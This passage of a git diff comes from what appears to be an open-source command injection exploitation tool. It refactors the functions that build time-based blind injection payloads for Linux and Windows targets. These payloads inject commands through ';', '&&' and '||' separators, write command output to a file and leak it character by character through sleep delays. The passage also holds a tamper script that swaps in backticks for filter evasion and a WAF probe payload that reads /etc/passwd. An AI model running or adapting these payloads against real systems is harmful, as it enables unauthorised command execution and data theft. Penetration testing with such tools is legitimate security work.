settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output, using readline(). - "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") " + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") " + separator + "[ " + str(j) + " -eq ${str1} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " ) separator = _urllib.parse.unquote(separator) @@ -328,10 +317,9 @@ def cmd_execution_alter_shell(separator, cmd, j, OUTPUT_TEXTFILE, timesec, http_ elif separator == "||" : pipe = "|" payload = (pipe + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")" + settings.SINGLE_WHITESPACE + - "[ " + str(j) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f = open('" + OUTPUT_TEXTFILE + "', 'w')\nf.write('" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX + settings.SINGLE_WHITESPACE + + "[ " + str(j) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print(len(file.readline()))\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: pass @@ -361,8 +349,8 @@ def get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, timesec, http "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c \"powershell.exe -InputFormat none " @@ -375,24 +363,22 @@ def get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, timesec, http if separator == ";" or separator == "%0a" : payload = (separator + # Use space as delimiter - "str=$(cut -d ' ' -f " + str(num_of_chars) + " < " + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "cut -d ' ' -f " + str(num_of_chars) + " < " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(ascii_char) + " -ne ${str} ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0" + separator + # Use space as delimiter - "str=$(awk '{print$" + str(num_of_chars) + "}'<" + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "awk '{print$" + str(num_of_chars) + "}'<" + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) @@ -400,14 +386,13 @@ def get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, timesec, http elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(cat " + OUTPUT_TEXTFILE + + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + pipe + "tr -d '\\n'" + pipe + "cut -c " + str(num_of_chars) + pipe + "od -N 1 -i" + pipe + "head -1" + pipe + "awk '{print$2}') ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) else: pass @@ -426,38 +411,36 @@ def get_char_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, t "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a" : payload = (separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(ascii_char) + " -ne ${str} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator + "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) separator = _urllib.parse.unquote(separator) @@ -465,9 +448,8 @@ def get_char_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, t elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(ord(file.readlines()[0][" + str(num_of_chars - 1) + "]))\nexit(0)\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: pass @@ -496,8 +478,8 @@ def fp_result(separator, OUTPUT_TEXTFILE, ascii_char, timesec, http_request_meth "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in (' cmd /c \"powershell.exe -InputFormat none " @@ -509,23 +491,21 @@ def fp_result(separator, OUTPUT_TEXTFILE, ascii_char, timesec, http_request_meth else: if separator == ";" or separator == "%0a" : payload = (separator + - "str=$(cut -c1-2 " + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "cut -c1-2 " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(ord(str(ascii_char))) + " -ne ${str} ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0" + separator + - "str=$(cut -c1-2 " + OUTPUT_TEXTFILE + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "cut -c1-2 " + OUTPUT_TEXTFILE + settings.CMD_SUB_SUFFIX + separator + "[ " + str(ord(str(ascii_char))) + " -eq ${str} ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) @@ -533,9 +513,8 @@ def fp_result(separator, OUTPUT_TEXTFILE, ascii_char, timesec, http_request_meth elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(cat " + OUTPUT_TEXTFILE + ") ] " + separator + - "sleep " + str(timesec) + - separator + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + "cat " + OUTPUT_TEXTFILE + ") ] " + separator + + "sleep " + str(timesec) ) else: pass @@ -555,37 +534,35 @@ def fp_result_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a" : payload = (separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(ascii_char) + " -ne ${str} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\") " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\") " + separator + "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) separator = _urllib.parse.unquote(separator) @@ -593,9 +570,8 @@ def fp_result_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"with open('" + OUTPUT_TEXTFILE +"') as file: print(file.readlines()[0][" + str(num_of_chars - 1) + "])\nexit(0)\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: pass diff --git a/src/core/tamper/backticks.py b/src/core/tamper/backticks.py index a9d1c80086..ae21a90b08 100644 --- a/src/core/tamper/backticks.py +++ b/src/core/tamper/backticks.py @@ -13,8 +13,10 @@ For more see the file 'readme/COPYING' for copying permission. """ +from src.utils import menu from src.utils import settings + """ About: Uses backticks instead of "$()" for commands substitution on the generated payloads. Notes: This tamper script works against Unix-like target(s). @@ -27,8 +29,9 @@ def tamper(payload): settings.TAMPER_SCRIPTS[__tamper__] = True - settings.USE_BACKTICKS = True - payload = payload.replace("$((", "`expr" + settings.WHITESPACES[0]).replace("))", "`") + if not menu.options.alter_shell and not settings.TARGET_OS == settings.OS.WINDOWS: + settings.USE_BACKTICKS = True + settings.CMD_SUB_PREFIX = settings.CMD_SUB_SUFFIX = "`" return payload # eof \ No newline at end of file diff --git a/src/utils/settings.py b/src/utils/settings.py index ad97f3487b..5b8838e89b 100755 --- a/src/utils/settings.py +++ b/src/utils/settings.py @@ -262,7 +262,7 @@ def sys_argv_errors(): DESCRIPTION = "The command injection exploiter" AUTHOR = "Anastasios Stasinopoulos" VERSION_NUM = "4.1" -REVISION = "1" +REVISION = "2" STABLE_RELEASE = False VERSION = "v" if STABLE_RELEASE: @@ -329,6 +329,9 @@ def sys_argv_errors(): CMD_NUL = "" +CMD_SUB_PREFIX = "$(" +CMD_SUB_SUFFIX = ")" + # Maybe a WAF/IPS protection. WAF_CHECK_PAYLOAD = "cat /etc/passwd|uname&&ping -c3 localhost;ls ../" WAF_ENABLED = False @@ -340,14 +343,16 @@ class HEURISTIC_TEST(object): RAND_A = random.randint(1,10000) RAND_B = random.randint(1,10000) CALC_STRING = str(RAND_A) + " %2B " + str(RAND_B) -BASIC_STRING = "(" + CALC_STRING + ")" -BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + BASIC_STRING + ")%26echo $(" + BASIC_STRING + ")|echo $(" + BASIC_STRING + ")" + RANDOM_STRING_GENERATOR , - "|set /a " + BASIC_STRING + "%26set /a " + BASIC_STRING - ] +BASIC_STRING = "" +BASIC_COMMAND_INJECTION_PAYLOADS = [] ALTER_SHELL_BASIC_STRING = " -c \"print(int(" + CALC_STRING + "))\"" -ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")%26echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")|echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")", - "|for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL + " &for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL - ] +ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS = [";echo " + CMD_SUB_PREFIX + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + CMD_SUB_SUFFIX + + "%26echo " + CMD_SUB_PREFIX + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + CMD_SUB_SUFFIX + + "|echo " + CMD_SUB_PREFIX + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + CMD_SUB_SUFFIX + + RANDOM_STRING_GENERATOR, + "|for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL + + " &for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL + ] BASIC_COMMAND_INJECTION_RESULT = str(RAND_A + RAND_B) IDENTIFIED_COMMAND_INJECTION = False